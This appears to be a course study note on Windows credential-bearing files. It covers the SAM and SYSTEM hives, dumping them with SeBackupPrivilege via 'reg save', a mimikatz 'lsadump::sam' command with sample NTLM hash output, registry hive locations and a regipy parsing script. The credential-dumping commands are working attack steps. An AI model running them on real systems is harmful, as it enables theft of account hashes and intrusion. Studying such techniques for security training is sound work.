## Security Accounts Manager (SAM + SYSTEM)

The SAM (Security Accounts Manager) file is a critical component of Windows that stores user account credentials for local accounts.

The SAM file contains various things, including:
- Usernames and password hashes
- Account Information
	- Security Identifiers (SIDs)
- Group Memberships

The SAM file is located in the directory
```powershell
C:\Windows\System32\config
```

By default it cannot be directly accessed, since it is locked by the operating system. Sometimes it is however possible to find backup copies of it.

## SAM Dump with SeBackupPrivilege

However, by having the `SeBackupPrivilege`, it is possible to create copies of the SAM and SYSTEM files.

The `SeBackupPrivilege` is a system privilege that allows users or services to back up files. Since some files are locked for various reasons, the privilege allows users or services to bypass normal file security restrictions.

It is granted to backup operators, system administrators, and trusted backup software.

Since the privilege by design allows to bypass security restrictions, it introduces a *securiry risk* to consider. The privilege should therefore be restricted to only those who stricly need it.

To assign the feature to a user, you can assign the user to the `Backup Operators`, which is a group specifically designed for users who need the `SeBackupPrivilege`.

```powershell
Add-LocalGroupMember -Group "Backup Operators" -Member "Leonardo"
```

Once we have that privilege, it is possible to copy SAM and SYSTEM as follows
```powershell
reg save hklm\sam C:\Users\Leonardo\Desktop\SAM.hive
```

```powershell
reg save hklm\system C:\Users\Leonardo\Desktop\SYSTEM.hive
```

## Mimikatz to dump LSASS Process

We can use `mimikatz` to dump the hashes saved within the Local Security Authority Subsystem Service (LSASS).

```powershell
mimikatz64.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit"
```

We will see something of the sort
```powershell
RID  : 000003e8 (1000)
User : Quickemu
	Hash NTLM: 2b576acbe6bcfda7294d6bd18041b8fe
...
RID  : 000003e9 (1001)
User : Leonardo
	Hash NTLM: fd3e9753bc655918982e7f9c08b4b022
```

## Registry Hives

The Windows registry is a hierarchical database structured following a tree-like data structure into `registry hives`.

Each hive is made up of multiple keys and values, and these hives are stored as files on the system.

These data sources are very useful for `threat intelligence`, as they can be used as `Indicator of Compromise` (IOC) for specific malware.

- `HKEY_CLASSES_ROOT (HKCR)`
```powershell
C:\Windows\System32\Config\Software
```

- `HKEY_LOCAL_MACHINE (HKLM)`
```powershell
C:\Windows\System32\Config\SYSTEM
```

- `HKEY_USERS (HKU)`
```powershell
C:\Windows\System32\Config\DEFAULT
```

- `HKEY_CURRENT_USER (HKCU)`
```powershell
C:\Users\<UserName>\NTUSER.DAT
```

- `HKEY_CURRENT_CONFIG (HKCC)`
```powershell
C:\Windows\System32\Config\SystemProfile
```

---

To explore the contents of a hive there is the `regipy` python package.

```powershell
python3 -m venv venv
. venv/bin/activate
pip3 install regipy
```

```python
#!/usr/bin/env python3

from regipy.registry import RegistryHive

def list_registry_keys(hive_path):
	# Load the registry hive
	hive = RegistryHive(hive_path)
	for entry in hive.recurse_subkeys(as_json=True):
		print(entry)

if __name__ == "__main__":
	list_registry_keys("./SYSTEM")
```

## Extra 

### Configuration Files

Certain location are most often used by application to store configuration files.
```powershell
%AppData%
%LocalAppData%
```

### Paging File

If paging is enabled, the system will create a `pagefile.sys` file.
```powershell
C:\pagefile.sys
```

The `pagefile.sys` is kind of like the swap file on Linux. It stores data if the RAM is fully used. 

### Hibernation File

When the hibernation feature is enabled, windows will store the content of the system's RAM into the file `hiberfil.sys` when the computer is put into hibernation.
```powershell
C:\hiberfil.sys
```

---
## References

Mimikatz: https://github.com/gentilkiwi/mimikatz

Regipy: https://github.com/mkorman90/regipy

Course Material: https://github.com/LeonardoE95/yt-en/blob/main/src/2024-12-05-windows-privesc-sensitive-files/content/notes.txt